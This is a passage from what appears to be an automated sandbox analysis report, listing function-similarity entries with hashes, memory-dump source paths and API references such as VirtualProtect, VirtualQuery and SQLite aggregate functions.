                                                                                                                                            • Instruction ID: ee1c88bcb7bf17ca4bbb7f5b05afb30e27c1f31fcd5655c10b75829973c74d2c
                                                                                                                                            • Opcode Fuzzy Hash: 38af854695d88063867f47c327f837f6ef6e7ecf0c5df9d1445217bf7ec35edf
                                                                                                                                            • Instruction Fuzzy Hash: 3C31E8B0A086858BEF215FA4C4A029E7BB4EF8D71CF24C729EC5197390D778C4428B92
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 3
                                                                                                                                            • API String ID: 0-1842515611
                                                                                                                                            • Opcode ID: aff4d5094be7a14891d1516a6f6211dfce19b2a57278dc6b86adcafc08da7d25
                                                                                                                                            • Instruction ID: c626fe9c01af6656bc1901436286d48693416cfa5ee9491a07d78c824d9510c7
                                                                                                                                            • Opcode Fuzzy Hash: aff4d5094be7a14891d1516a6f6211dfce19b2a57278dc6b86adcafc08da7d25
                                                                                                                                            • Instruction Fuzzy Hash: 4631ADB0A042958BDB908F28C4C07C9BBF0BB45318F24C1A9E9988B346D376EC91CF81
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$ProtectQuery
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 1027372294-2766056989
                                                                                                                                            • Opcode ID: 767c4381f0a500dca40e41fb95efa6bf75c3e719ed81a202d7ecd4e96cbe2b03
                                                                                                                                            • Instruction ID: 4fec5ea76922f852ca7d192f865ae09c671dcead33a5dfea62c4ae1a1cc41790
                                                                                                                                            • Opcode Fuzzy Hash: 767c4381f0a500dca40e41fb95efa6bf75c3e719ed81a202d7ecd4e96cbe2b03
                                                                                                                                            • Instruction Fuzzy Hash: 65319AB6915B018FD740DF68D98061ABBF0BF84314F69C91DD89E87350EB30E844CB82
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 61E1E2B7
                                                                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 61E1E2C3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3265351223-3916222277
                                                                                                                                            • Opcode ID: 284a7e7d2da9a4d4ab157598865195ae1c3f0bde0c74834f4f5f981b267ab200
                                                                                                                                            • Instruction ID: bcca8e5808c92f6b07b9230614678ab68729562935ef82a8d2553d496b43b86c
                                                                                                                                            • Opcode Fuzzy Hash: 284a7e7d2da9a4d4ab157598865195ae1c3f0bde0c74834f4f5f981b267ab200
                                                                                                                                            • Instruction Fuzzy Hash: 33118E70608B85CBDF0A9FA9C4C625A7BF0EF49308F20849CE8948B249D730C960C792